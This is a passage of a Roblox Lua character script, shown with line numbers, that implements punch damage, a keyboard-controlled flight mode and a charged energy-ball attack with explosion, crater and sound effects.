    mesh2.MeshId='http://www.roblox.com/asset/?id=20329976'
10435
    mesh2.Scale=Vector3.new(3,1.5,3)
10436
    for i,v in pairs(FindNearestTorso(torso.CFrame.p,4))do
10437
        if v:FindFirstChild('Humanoid') then
10438
            v.Humanoid:TakeDamage(math.random(2,6))
10439
        end
10440
    end
10441
    coroutine.resume(coroutine.create(function()
10442
        for i=0,0.62,0.4 do
10443
            wait()
10444
            part.CFrame=part.CFrame
10445
            part.Transparency=i
10446
            mesh.Scale=mesh.Scale+Vector3.new(0.4,0.4,0.4)
10447
            part2.CFrame=part2.CFrame
10448
            part2.Transparency=i
10449
            mesh2.Scale=mesh2.Scale+Vector3.new(0.4,0.2,0.4)
10450
            end
10451
        part.Parent=nil
10452
        part2.Parent=nil
10453
    end))
10454
end
10455
----------------------------------------------------
10456
rarm.Touched:connect(function(ht)
10457
    hit = ht.Parent
10458
    if ht and hit:IsA("Model") then
10459
            if hit:FindFirstChild("Humanoid") then
10460
                if hit.Name ~= p.Name then
10461
                    if Debounces.RPunch == true and Debounces.RPunched == false then
10462
                            Debounces.RPunched = true
10463
                                hit:FindFirstChild("Humanoid"):TakeDamage(math.random(5,8))
10464
                                    if Debounces.ks==true then
10465
                                    z = Instance.new("Sound",hed)
10466
                                    z.SoundId = "rbxassetid://169380525"
10467
									z.Pitch = ptz[math.random(1,#ptz)]
10468
                                    z.Volume = 1
10469
                                    z:Play()
10470
                                    end
10471
                            wait(.2)
10472
                            Debounces.RPunched = false
10473
                    end
10474
                end
10475
            end
10476
    elseif ht and hit:IsA("Hat") then
10477
        if hit.Parent.Name ~= p.Name then
10478
            if hit.Parent:FindFirstChild("Humanoid") then
10479
                   if Debounces.RPunch == true and Debounces.RPunched == false then
10480
                            Debounces.RPunched = true
10481
                            hit.Parent:FindFirstChild("Humanoid"):TakeDamage(math.random(5,8))
10482
                                    if Debounces.ks==true then
10483
                                    z = Instance.new("Sound",hed)
10484
                                    z.SoundId = "rbxassetid://169380525"
10485
									z.Pitch = ptz[math.random(1,#ptz)]
10486
                                    z.Volume = 1
10487
                                    z:Play()
10488
                                    end
10489
                            wait(.2)
10490
                Debounces.RPunched = false
10491
				end
10492
            end
10493
        end
10494
    end
10495
end)
10496
larm.Touched:connect(function(ht)
10497
    hit = ht.Parent
10498
    if ht and hit:IsA("Model") then
10499
            if hit:FindFirstChild("Humanoid") then
10500
                if hit.Name ~= p.Name then
10501
                    if Debounces.LPunch == true and Debounces.LPunched == false then
10502
                            Debounces.LPunched = true
10503
                                hit:FindFirstChild("Humanoid"):TakeDamage(math.random(4,8))
10504
                                    if Debounces.ks2==true then
10505
                                    z = Instance.new("Sound",hed)
10506
                                    z.SoundId = "rbxassetid://169380525"
10507
									z.Pitch = ptz[math.random(1,#ptz)]
10508
                                    z.Volume = 1
10509
                                    z:Play()
10510
                                    end
10511
                            wait(.2)
10512
                            Debounces.LPunched = false
10513
                    end
10514
                end
10515
            end
10516
    elseif ht and hit:IsA("Hat") then
10517
        if hit.Parent.Name ~= p.Name then
10518
            if hit.Parent:FindFirstChild("Humanoid") then
10519
                   if Debounces.LPunch == true and Debounces.LPunched == false then
10520
                            Debounces.LPunched = true
10521
                            hit.Parent:FindFirstChild("Humanoid"):TakeDamage(math.random(4,8))
10522
                                    if Debounces.ks2==true then
10523
                                    z = Instance.new("Sound",hed)
10524
                                    z.SoundId = "rbxassetid://169380525"
10525
									z.Pitch = ptz[math.random(1,#ptz)]
10526
                                    z.Volume = 1
10527
                                    z:Play()
10528
                                    end
10529
                            wait(.2)
10530
                Debounces.LPunched = false
10531
				end
10532
            end
10533
        end
10534
    end
10535
end)
10536
----------------------------------------------------
10537
local player = game.Players.LocalPlayer
10538
local pchar = player.Character
10539
local mouse = player:GetMouse()
10540
local cam = workspace.CurrentCamera
10541
10542
local rad = math.rad
10543
10544
local keysDown = {}
10545
local flySpeed = 0
10546
local MAX_FLY_SPEED = 150
10547
10548
local canFly = false
10549
local flyToggled = false
10550
10551
local forward, side = 0, 0
10552
local lastForward, lastSide = 0, 0
10553
10554
local floatBP = Instance.new("BodyPosition")
10555
floatBP.maxForce = Vector3.new(0, math.huge, 0)
10556
local flyBV = Instance.new("BodyVelocity")
10557
flyBV.maxForce = Vector3.new(9e9, 9e9, 9e9)
10558
local turnBG = Instance.new("BodyGyro")
10559
turnBG.maxTorque = Vector3.new(math.huge, math.huge, math.huge)
10560
10561
mouse.KeyDown:connect(function(key)
10562
        keysDown[key] = true
10563
10564
        if key == "f" then
10565
                flyToggled = not flyToggled
10566
10567
        if not flyToggled then
10568
                stanceToggle = "Normal"
10569
                floatBP.Parent = nil
10570
                flyBV.Parent = nil
10571
                turnBG.Parent = nil
10572
                root.Velocity = Vector3.new()
10573
                pchar.Humanoid.PlatformStand = false
10574
        end
10575
end
10576
10577
end)
10578
mouse.KeyUp:connect(function(key)
10579
        keysDown[key] = nil
10580
end)
10581
10582
local function updateFly()
10583
10584
        if not flyToggled then return end
10585
10586
        lastForward = forward
10587
        lastSide = side
10588
10589
        forward = 0
10590
        side = 0
10591
10592
        if keysDown.w then
10593
                forward = forward + 1
10594
        end
10595
        if keysDown.s then
10596
                forward = forward - 1
10597
        end
10598
        if keysDown.a then
10599
                side = side - 1
10600
        end
10601
        if keysDown.d then
10602
                side = side + 1
10603
        end
10604
10605
        canFly = (forward ~= 0 or side ~= 0)
10606
10607
        if canFly then
10608
                stanceToggle = "Floating"
10609
                turnBG.Parent = root
10610
                floatBP.Parent = nil
10611
                flyBV.Parent = root
10612
10613
                flySpeed = flySpeed + 1 + (flySpeed / MAX_FLY_SPEED)
10614
                if flySpeed > MAX_FLY_SPEED then flySpeed = MAX_FLY_SPEED end
10615
        else
10616
                floatBP.position = root.Position
10617
                floatBP.Parent = root
10618
10619
                flySpeed = flySpeed - 1
10620
                if flySpeed < 0 then flySpeed = 0 end
10621
        end
10622
10623
        local camCF = cam.CoordinateFrame
10624
        local in_forward = canFly and forward or lastForward
10625
        local in_side = canFly and side or lastSide
10626
10627
        flyBV.velocity = ((camCF.lookVector * in_forward) + (camCF * CFrame.new(in_side,
10628
in_forward * 0.2, 0).p) - camCF.p) * flySpeed
10629
10630
        turnBG.cframe = camCF * CFrame.Angles(-rad(forward * (flySpeed / MAX_FLY_SPEED)), 0,
10631
0)
10632
end
10633
10634
game:service'RunService'.RenderStepped:connect(function()
10635
        if flyToggled then
10636
                pchar.Humanoid.PlatformStand = true
10637
        end
10638
        updateFly()
10639
end)
10640
-------------------------------
10641
mouse.KeyDown:connect(function(key)
10642
	if key == "q" then
10643
		if Debounces.CanAttack == true then
10644
			Debounces.CanAttack = false
10645
			Debounces.NoIdl = true
10646
			Debounces.on = true
10647
			function FindNearestTorso(Position,Distance,SinglePlayer)
10648
				if SinglePlayer then return(SinglePlayer.Torso.CFrame.p -Position).magnitude < Distance end
10649
					local List = {}
10650
					for i,v in pairs(workspace:GetChildren())do
10651
						if v:IsA("Model")then
10652
							if v:findFirstChild("Torso")then
10653
								if v ~= char then
10654
									if(v.Torso.Position -Position).magnitude <= Distance then
10655
										table.insert(List,v)
10656
									end
10657
								end
10658
							end
10659
						end
10660
					end
10661
				return List
10662
			end
10663
	z = Instance.new("Sound",hed)
10664
	z.SoundId = "rbxassetid://232213955"
10665
	z.Pitch = 1
10666
	z.Volume = 1
10667
	wait(0.2)
10668
	z:Play()
10669
	sp = Instance.new("Part",rarm)
10670
	sp.Anchored = true
10671
	sp.CanCollide = false
10672
	sp.Locked = true
10673
	sp.Transparency = 0
10674
	sp.Material = "Neon"
10675
	sp.Size = Vector3.new(1,1,1)
10676
	sp.TopSurface = "SmoothNoOutlines"
10677
	sp.BottomSurface = "SmoothNoOutlines"
10678
	sp.BrickColor = BrickColor.new("Royal purple")
10679
	spm = Instance.new("SpecialMesh",sp)
10680
	spm.MeshType = "Sphere"
10681
	spm.Scale = Vector3.new(21,21,21)
10682
	sp2 = Instance.new("Part", rarm)
10683
	sp2.Name = "Energy"
10684
	sp2.BrickColor = BrickColor.new("Royal purple")
10685
	sp2.Size = Vector3.new(1, 1, 1)
10686
	sp2.Shape = "Ball"
10687
	sp2.CanCollide = false
10688
	sp2.Anchored = true
10689
	sp2.Locked = true
10690
	sp2.TopSurface = 0
10691
	sp2.BottomSurface = 0
10692
	sp2.Transparency = 1
10693
	spm2 = Instance.new("SpecialMesh",sp2)
10694
	spm2.MeshId = "rbxassetid://9982590"
10695
	spm2.Scale = Vector3.new(2,2,2)
10696
	for i = 1, 20 do
10697
		spm.Scale = spm.Scale - Vector3.new(1,1,1)
10698
		sp.CFrame = root.CFrame*CFrame.new(0,1,-2)
10699
		rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.62,0)*CFrame.Angles(math.rad(-6),math.rad(-6),math.rad(8)), 0.4)
10700
		larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.62,0)*CFrame.Angles(math.rad(-6),math.rad(6),math.rad(-8)), 0.4)
10701
		hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(0),0), 0.4)
10702
		torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(0, math.rad(0), math.rad(0)), 0.4)
10703
		lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(-8)), 0.4)
10704
		rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(8)), 0.4)
10705
		if Debounces.on == false then break end
10706
		rs:wait()
10707
	end
10708
	for i = 1, 100, 20 do rs:wait()
10709
		sp.CFrame = root.CFrame*CFrame.new(0,1,-2)
10710
	end
10711
	for i = 1, 20 do
10712
		sp.CFrame = root.CFrame*CFrame.new(0,1,-2)
10713
		rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.62,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(8)), 0.4)
10714
		larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.62,.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-40)), 0.4)
10715
		hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(10),math.rad(-30),0), 0.4)
10716
		torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(0, math.rad(40), math.rad(0)), 0.4)
10717
		lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(-8)), 0.4)
10718
		rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(8)), 0.4)
10719
		if Debounces.on == false then break end
10720
		rs:wait()
10721
	end
10722
	sp.Transparency = 1
10723
	for i = 1, 20 do
10724
		rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.62,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(8)), 0.4)
10725
		larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.2,0.62,-.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(40)), 0.4)
10726
		hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(-14),math.rad(50),0), 0.4)
10727
		torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(0, math.rad(-50), math.rad(0)), 0.4)
10728
		lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(-8)), 0.4)
10729
		rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(0, 0, math.rad(8)), 0.4)
10730
		if Debounces.on == false then break end
10731
		rs:wait()
10732
	end
10733
	wait(1)
10734
	sp.Transparency = 0
10735
	sp2.Transparency = 0.84
10736
	for i = 1, 20 do
10737
		--spm.Scale = spm.Scale - Vector3.new(1,1,1)
10738
		sp.CFrame = rarm.CFrame*CFrame.new(0,-1,0)
10739
		sp2.CFrame = sp.CFrame * CFrame.new(0,0,0) * CFrame.Angles(math.rad(-i), math.rad(-i), math.rad(i))
10740
		rarm.Weld.C0 = Lerp(rarm.Weld.C0, CFrame.new(1.5,0.55,0)*CFrame.Angles(math.rad(110),math.rad(-6),math.rad(140)), 0.4)
10741
		larm.Weld.C0 = Lerp(larm.Weld.C0, CFrame.new(-1.5,0.55,0)*CFrame.Angles(math.rad(80),math.rad(6),math.rad(-40)), 0.2)
10742
		hed.Weld.C0 = Lerp(hed.Weld.C0, CFrame.new(0,1.5,-.2)*CFrame.Angles(math.rad(0),math.rad(30),0), 0.2)
10743
		torso.Weld.C0 = Lerp(torso.Weld.C0, CFrame.new(0, 0, 0) * CFrame.Angles(math.rad(0), math.rad(-30), math.rad(0)), 0.3)
10744
		lleg.Weld.C0 = Lerp(lleg.Weld.C0, CFrame.new(-0.5, -1, 0) * CFrame.Angles(math.rad(20), 0, math.rad(-14)), 0.2)
10745
		rleg.Weld.C0 = Lerp(rleg.Weld.C0, CFrame.new(0.5, -1, 0) * CFrame.Angles(math.rad(-16), 0, math.rad(8)), 0.2)
10746
		if Debounces.on == false then break end
10747
		rs:wait()
10748
	end
10749
	for i = 1, 2880, 50 do
10750
		rs:wait()
10751
		sp.CFrame = rarm.CFrame*CFrame.new(0,-1,0)
10752
		sp2.CFrame = rarm.CFrame * CFrame.new(0,-1,0) * CFrame.Angles(math.rad(-i/10), math.rad(-i/10), math.rad(i/10))
10753
		rs:wait()
10754
	end
10755
	sp:Destroy()
10756
	sp2:Destroy()
10757
	local X = Instance.new("Part",char)
10758
	local O = Instance.new("ObjectValue",X)
10759
	O.Name = "creator"
10760
	X.Locked = true
10761
	X.Name = "Shell"
10762
	X.Anchored = false
10763
	X.CanCollide = false
10764
	X.Transparency = 0
10765
	X.Reflectance = 0
10766
	X.BottomSurface = 0
10767
	X.TopSurface = 0
10768
	X.Shape = 0
10769
	local V = Instance.new("ObjectValue",X)
10770
	V.Value = char
10771
	V.Name = "creator"
10772
	X.BrickColor = BrickColor.new("Royal purple")
10773
	X.Size = Vector3.new(2,2,2)
10774
	X.Material = "Neon"
10775
	local Z = Instance.new("SpecialMesh",X)
10776
	Z.MeshType = "Sphere"
10777
	Z.Scale = Vector3.new(0.5,0.5,1)
10778
	X.CFrame = rarm.CFrame*CFrame.new(-3,0,0)
10779
	local bv = Instance.new("BodyVelocity",X)
10780
	bv.maxForce = Vector3.new(99999,99999,99999)
10781
	X.CFrame = CFrame.new(X.Position,mouse.Hit.p)
10782
	bv.velocity = X.CFrame.lookVector*65
10783
10784
	Explode = X.Touched:connect(function(hit)
10785
		if hit ~= char and hit.Name ~= "Shell" then
10786
			local cf = X.CFrame
10787
			bv:Destroy()
10788
			X.Anchored = true
10789
			Z:Remove()
10790
			Explode:disconnect()
10791
			X.Size = Vector3.new(3,3,3)
10792
			X.Touched:connect(function(hit) end)
10793
			X.CanCollide = false
10794
			local part3 = Instance.new("Part", rarm)
10795
			part3.Anchored=true
10796
			part3.CanCollide=false
10797
			part3.Locked = true
10798
			part3.TopSurface = "SmoothNoOutlines"
10799
			part3.BottomSurface = "SmoothNoOutlines"
10800
			part3.FormFactor='Custom'
10801
			part3.Size=Vector3.new(1,1, 1)
10802
			part3.CFrame=X.CFrame
10803
			part3.Transparency=0
10804
			part3.BrickColor=BrickColor.new("Royal purple")
10805
			local mesh3 = Instance.new("SpecialMesh",part3)
10806
			mesh3.MeshType = "Sphere"
10807
			mesh3.Scale = Vector3.new(1,1,1)
10808
			--debris:AddItem(X,8)
10809
			local part4 = Instance.new("Part", rarm)
10810
			part4.Material = "Neon"
10811
			part4.Anchored=true
10812
			part4.CanCollide=false
10813
			part4.Locked = true
10814
			part4.TopSurface = "SmoothNoOutlines"
10815
			part4.BottomSurface = "SmoothNoOutlines"
10816
			part4.FormFactor='Custom'
10817
			part4.Size=Vector3.new(1,1, 1)
10818
			part4.CFrame=X.CFrame
10819
			part4.Transparency=0
10820
			part4.BrickColor=BrickColor.new("Hot pink")
10821
			local mesh4 = Instance.new("SpecialMesh",part4)
10822
			mesh4.MeshType = "Sphere"
10823
			mesh4.Scale = Vector3.new(.5,.5,.5)
10824
			local part7 = Instance.new("Part", rarm)
10825
			part7.Material = "Neon"
10826
			part7.Anchored=true
10827
			part7.CanCollide=false
10828
			part7.Locked = true
10829
			part7.TopSurface = "SmoothNoOutlines"
10830
			part7.BottomSurface = "SmoothNoOutlines"
10831
			part7.FormFactor='Custom'
10832
			part7.Size=Vector3.new(1,1, 1)
10833
			part7.CFrame=X.CFrame
10834
			part7.Transparency=0
10835
			part7.BrickColor=BrickColor.new("Really black")
10836
			local mesh7 = Instance.new("SpecialMesh",part7)
10837
			mesh7.MeshType = "Sphere"
10838
			mesh7.Scale = Vector3.new(0.1, 0.1, 0.1)
10839
		--[[X.Touched:connect(function(ht)
10840
				hit = ht.Parent
10841
			if ht and hit:IsA("Model") then
10842
					if hit:FindFirstChild("Humanoid") then
10843
						if hit.Name ~= p.Name then
10844
							hit:FindFirstChild("Humanoid"):TakeDamage(math.random(4,6))
10845
							wait(.3)
10846
						end
10847
					end
10848
			elseif ht and hit:IsA("Hat") then
10849
				if hit.Parent.Name ~= p.Name then
10850
					if hit.Parent:FindFirstChild("Humanoid") then
10851
						hit.Parent:FindFirstChild("Humanoid"):TakeDamage(math.random(4,6))
10852
						wait(.3)
10853
					end
10854
				end
10855
			end
10856
		end)
10857
		part3.Touched:connect(function(ht)
10858
				hit = ht.Parent
10859
			if ht and hit:IsA("Model") then
10860
					if hit:FindFirstChild("Humanoid") then
10861
						if hit.Name ~= p.Name then
10862
							hit:FindFirstChild("Humanoid"):TakeDamage(math.random(4,6))
10863
							wait(.3)
10864
						end
10865
					end
10866
			elseif ht and hit:IsA("Hat") then
10867
				if hit.Parent.Name ~= p.Name then
10868
					if hit.Parent:FindFirstChild("Humanoid") then
10869
						hit.Parent:FindFirstChild("Humanoid"):TakeDamage(math.random(4,6))
10870
						wait(.3)
10871
					end
10872
				end
10873
			end
10874
		end)]]--
10875
		for i,v in pairs(FindNearestTorso(X.CFrame.p,140))do
10876
			if v:FindFirstChild('Humanoid') then
10877
				v.Humanoid:TakeDamage(math.random(60,90))
10878
				v.Humanoid.PlatformStand = true
10879
				v:FindFirstChild("Torso").Velocity = hed.CFrame.lookVector * 100
10880
			end
10881
		end
10882
10883
		local acos = math.acos
10884
		local sqrt = math.sqrt
10885
		local Vec3 = Vector3.new
10886
		local fromAxisAngle = CFrame.fromAxisAngle
10887
10888
		local function toAxisAngle(CFr)
10889
			local X,Y,Z,R00,R01,R02,R10,R11,R12,R20,R21,R22 = CFr:components()
10890
			local Angle = math.acos((R00+R11+R22-1)/2)
10891
			local A = (R21-R12)^2+(R02-R20)^2+(R10-R01)^2
10892
			A = A == 0 and 0.00001 or A
10893
			local B = (R21-R12)^2+(R02-R20)^2+(R10-R01)^2
10894
			B = B == 0 and 0.00001 or B
10895
			local C = (R21-R12)^2+(R02-R20)^2+(R10-R01)^2
10896
			C = C == 0 and 0.00001 or C
10897
			local x = (R21-R12)/sqrt(A)
10898
			local y = (R02-R20)/sqrt(B)
10899
			local z = (R10-R01)/sqrt(C)
10900
			return Vec3(x,y,z),Angle
10901
		end
10902
10903
		function ApplyTrig(Num,Func)
10904
			local Min,Max = Func(0),Func(1)
10905
			local i = Func(Num)
10906
			return (i-Min)/(Max-Min)
10907
		end
10908
10909
		function LerpCFrame(CFrame1,CFrame2,Num)
10910
			local Vec,Ang = toAxisAngle(CFrame1:inverse()*CFrame2)
10911
			return CFrame1*fromAxisAngle(Vec,Ang*Num) + (CFrame2.p-CFrame1.p)*Num
10912
		end
10913
10914
		function Crater(Torso,Radius)
10915
			Spawn(function()
10916
				local Ray = Ray.new(Torso.Position,Vector3.new(0,-1,0)*10)
10917
				local Ignore = {}
10918
				for i,v in pairs(game:GetService("Players"):GetPlayers()) do
10919
					if v.Character ~= nil then
10920
						Ignore[#Ignore+1] = v.Character
10921
					end
10922
				end
10923
				local Hit,Pos,SurfaceNorm = Workspace:FindPartOnRayWithIgnoreList(Ray,Ignore)
10924
				if Hit == nil then return end
10925
					local Parts = {}
10926
					for i = 1,360,10 do
10927
						local P = Instance.new("Part",Torso.Parent)
10928
						P.Anchored = true
10929
						P.FormFactor = "Custom"
10930
						P.BrickColor = Hit.BrickColor
10931
						P.Material = Hit.Material
10932
						P.TopSurface = "Smooth"
10933
						P.BottomSurface = "Smooth"
10934
						P.Size = Vector3.new(5,10,10)*(math.random(80,100)/100)
10935
						P.CFrame = ((CFrame.new(Pos,Pos+SurfaceNorm)*CFrame.Angles(math.rad(90),0,0))-Vector3.new(0,7,0))*CFrame.Angles(math.rad(math.random(-50,50)),math.rad(math.random(-50,50)),math.rad(math.random(-50,50)))
10936
						Parts[#Parts+1] = {P,P.CFrame,((CFrame.new(Pos,Pos+SurfaceNorm)*CFrame.Angles(math.rad(90),0,0))-Vector3.new(0,1,0))*CFrame.Angles(0,math.rad(i),0)*CFrame.new(0,0,-Radius)*CFrame.Angles(math.rad(math.random(-50,-20)),math.rad(math.random(-15,15)),math.rad(math.random(-15,15))),P.Size}
10937
						if math.random(0,5) == 0 then -- rubble
10938
							local P = Instance.new("Part",Torso.Parent)
10939
							P.Anchored = true
10940
							P.FormFactor = "Custom"
10941
							P.BrickColor = Hit.BrickColor
10942
							P.Material = Hit.Material
10943
							P.TopSurface = "Smooth"
10944
							P.BottomSurface = "Smooth"
10945
							P.Size = Vector3.new(2,2,2)*(math.random(80,100)/100)
10946
							P.CFrame = ((CFrame.new(Pos,Pos+SurfaceNorm)*CFrame.Angles(math.rad(90),0,0))-Vector3.new(0,2.5,0))*CFrame.Angles(math.rad(math.random(-50,50)),math.rad(math.random(-50,50)),math.rad(math.random(-50,50)))
10947
							Parts[#Parts+1] = {P,P.CFrame,(CFrame.new(Pos,Pos+SurfaceNorm)*CFrame.Angles(math.rad(90),0,0))*CFrame.Angles(0,math.rad(i),0)*CFrame.new(0,0,-Radius-8)*CFrame.Angles(math.rad(math.random(-90,90)),math.rad(math.random(-90,90)),math.rad(math.random(-90,90))),P.Size}
10948
							end
10949
						end
10950
						for i = 0,1,0.05 do
10951
							for i2,v in pairs(Parts) do
10952
								v[1].CFrame = LerpCFrame(v[2],v[3],ApplyTrig(i,math.cos))
10953
							end
10954
							wait(0.02)
10955
						end
10956
						for i,v in pairs(Parts) do
10957
							if v[1].Size.X > 2.1 then
10958
								v[1].CFrame = v[1].CFrame+Vector3.new(0,2,0)
10959
							end
10960
							v[1].Anchored = false
10961
						end
10962
						for i = 0,1,0.05 do
10963
							for i2,v in pairs(Parts) do
10964
								v[1].Transparency = i
10965
								if i == 1 then
10966
									v[1]:Destroy()
10967
								elseif i >= 0.25 then
10968
									v[1].CanCollide = false
10969
								end
10970
							end
10971
						wait(0.02)
10972
						end
10973
					Parts = nil
10974
					end)
10975
				end
10976
10977
				ROW = function(out, trans, s, wt, t, ang, plus)
10978
					for i = 1, 360, 360/t do
10979
						local c = Instance.new("Part", game.Workspace)
10980
						c.FormFactor = 3
10981
						c.TopSurface = 0
10982
						c.BottomSurface = 0
10983
						c.Size = s
10984
						c.Anchored = true
10985
						c.CanCollide = wt
10986
						c.Material=workspace.Base.Material
10987
						c.Transparency = trans
10988
						c.BrickColor = workspace.Base.BrickColor
10989
						c.CFrame = CFrame.new(X.CFrame.x,0,X.CFrame.z) * CFrame.Angles(0, math.rad(i +  plus), 0) *     CFrame.new(0, 0, out) * ang
10990
						c.Locked=true
10991
						game.Debris:AddItem(c,15)
10992
					end
10993
				end
10994
10995
				Part = function(x,y,z,color,tr,cc,an,parent)
10996
					local p = Instance.new('Part',parent or Weapon)
10997
					p.formFactor = 'Custom'
10998
					p.Size = Vector3.new(x,y,z)
10999
					p.BrickColor = BrickColor.new(color)
11000
					p.CanCollide = cc
11001
					p.Transparency = tr
11002
					p.Anchored = an
11003
					p.TopSurface,p.BottomSurface = 0,0
11004
					p.Locked=true
11005
					p:BreakJoints()
11006
				return p end
11007
11008
			Mesh = function(par,num,x,y,z)
11009
			local msh = _
11010
			if num == 1 then msh = Instance.new("CylinderMesh",par)
11011
			elseif num == 2 then msh = Instance.new("SpecialMesh",par) msh.MeshType = 3
11012
			elseif num == 3 then msh = Instance.new("BlockMesh",par)
11013
			elseif num == 4 then msh = Instance.new("SpecialMesh",par) msh.MeshType = "Torso"
11014
			elseif type(num) == 'string' then msh = Instance.new("SpecialMesh",par) msh.MeshId = num
11015
			end msh.Scale = Vector3.new(x,y,z)
11016
			return msh end
11017
11018
			function explosion(col1,col2,cfr,sz,rng,dmg)
11019
				local a= Part(1,1,1,col1,.5,false,true,workspace)
11020
				local a2= Part(1,1,1,col2,.5,false,true,workspace)
11021
				local a3= Part(1,1,1,col2,.5,false,true,workspace)
11022
				v1,v2,v3=sz.x,sz.y,sz.z
11023
				local m= Mesh(a,'http://www.roblox.com/asset/?id=1185246',v1,v2,v3)
11024
				local m2= Mesh(a2,3,v1/3,v2/3,v3/3)
11025
				local m3= Mesh(a3,3,v1/3,v2/3,v3/3)
11026
				a.CFrame=cfr
11027
				a2.CFrame=cfr*CFrame.Angles(math.random(),math.random(),math.random())
11028
				a3.CFrame=cfr*CFrame.Angles(math.random(),math.random(),math.random())
11029
11030
				Spawn(function()
11031
					while wait() do
11032
						if a.Transparency >= 1 then a:Destroy() a2:Destroy() a3:Destroy() break end
11033
							m.Scale=m.Scale+Vector3.new(.1,0.1,0.1)
11034
							m2.Scale=m2.Scale+Vector3.new(.1,0.1,0.1)
11035
							m3.Scale=m3.Scale+Vector3.new(.1,0.1,0.1)
11036
							a.Transparency=a.Transparency+0.05
11037
							a2.Transparency=a2.Transparency+0.05
11038
							a3.Transparency=a3.Transparency+0.05
11039
						end
11040
					end)
11041
				end
11042
11043
				Crater(X,20)
11044
				ROW(12, 0, Vector3.new(34.5, 30, 3), true, 8, CFrame.Angles(math.rad(math.random (30,60)), 0, math.rad    (math.random(-30,30))), 0)
11045
				z = Instance.new("Sound",X)
11046
				z.SoundId = "rbxassetid://231917744"
11047
				z.Pitch = .5
11048
				z.Volume = 10
11049
				z1 = Instance.new("Sound",X)
11050
				z1.SoundId = "rbxassetid://231917744"
11051
				z1.Pitch = .5
11052
				z1.Volume = 10
11053
				z2 = Instance.new("Sound",X)
11054
				z2.SoundId = "rbxassetid://231917744"
11055
				z2.Pitch = .5
11056
				z2.Volume = 10
11057
				z3 = Instance.new("Sound",X)
11058
				z3.SoundId = "rbxassetid://245537790"
11059
				z3.Pitch = .7
11060
				z3.Volume = 1
11061
				z4 = Instance.new("Sound",X)
11062
				z4.SoundId = "rbxassetid://245537790"
11063
				z4.Pitch = .7
11064
				z4.Volume = 1
11065
				wait(0.1)
11066
				z:Play()
11067
				z1:Play()
11068
				z2:Play()
11069
				z3:Play()
11070
				z4:Play()
11071
11072
				local part=Instance.new('Part',rarm)
11073
				part.Anchored=true
11074
				part.CanCollide=false
11075
				part.Locked = true
11076
				part.FormFactor='Custom'
11077
				part.Size=Vector3.new(1,1,1)
11078
				part.CFrame=X.CFrame*CFrame.new(0,0,0)
11079
				part.Transparency=0
11080
				part.BrickColor=BrickColor.new('Really black')
11081
				local mesh=Instance.new('SpecialMesh',part)
11082
				mesh.MeshId='http://www.roblox.com/asset/?id=20329976'
11083
				mesh.Scale=Vector3.new(2,2,2)
11084
				local part2=part:clone()
11085
				part2.Parent = rarm
11086
				part2.BrickColor=BrickColor.new("Royal purple")
11087
				local part5=part:clone()
11088
				part5.Parent = rarm
11089
				part5.BrickColor=BrickColor.new("Magenta")
11090
				local part6=part:clone()
11091
				part6.Parent = rarm
11092
				part6.BrickColor=BrickColor.new("Black")
11093
				local mesh2=mesh:clone()
11094
				mesh2.Parent=part2
11095
				mesh2.Scale=Vector3.new(3, 3, 3)
11096
				local mesh5=mesh:clone()
11097
				mesh5.Parent=part5
11098
				mesh5.Scale=Vector3.new(3, 3, 3)
11099
				local mesh6=mesh:clone()
11100
				mesh6.Parent=part6
11101
				mesh6.Scale=Vector3.new(3, 3, 3)
11102
				local blast = Instance.new("Part", rarm)
11103
				blast.BrickColor = BrickColor.new("Really black")
11104
				blast.Anchored = true
11105
				blast.CanCollide = false
11106
				blast.Locked = true
11107
				blast.Size = Vector3.new(1, 1, 1)
11108
				blast.TopSurface = "Smooth"
11109
				blast.BottomSurface = "Smooth"
11110
				blast.Transparency = 0
11111
				blast.CFrame = HandCF
11112
				local bm = Instance.new("SpecialMesh", blast)
11113
				bm.Scale = Vector3.new(5,1,5)
11114
				bm.MeshId = "rbxassetid://3270017"
11115
				local blast2 = Instance.new("Part", rarm)
11116
				blast2.BrickColor = BrickColor.new("Really black")
11117
				blast2.Anchored = true
11118
				blast2.CanCollide = false
11119
				blast2.Locked = true
11120
				blast2.Size = Vector3.new(1, 1, 1)
11121
				blast2.TopSurface = "Smooth"
11122
				blast2.BottomSurface = "Smooth"
11123
				blast2.Transparency = 0
11124
				blast2.CFrame = HandCF
11125
				local bm2 = Instance.new("SpecialMesh", blast2)
11126
				bm2.Scale = Vector3.new(3,1,3)
11127
				bm2.MeshId = "rbxassetid://3270017"
11128
				local blast3 = Instance.new("Part", rarm)
11129
				blast3.BrickColor = BrickColor.new("Really black")
11130
				blast3.Anchored = true
11131
				blast3.CanCollide = false
11132
				blast3.Locked = true
11133
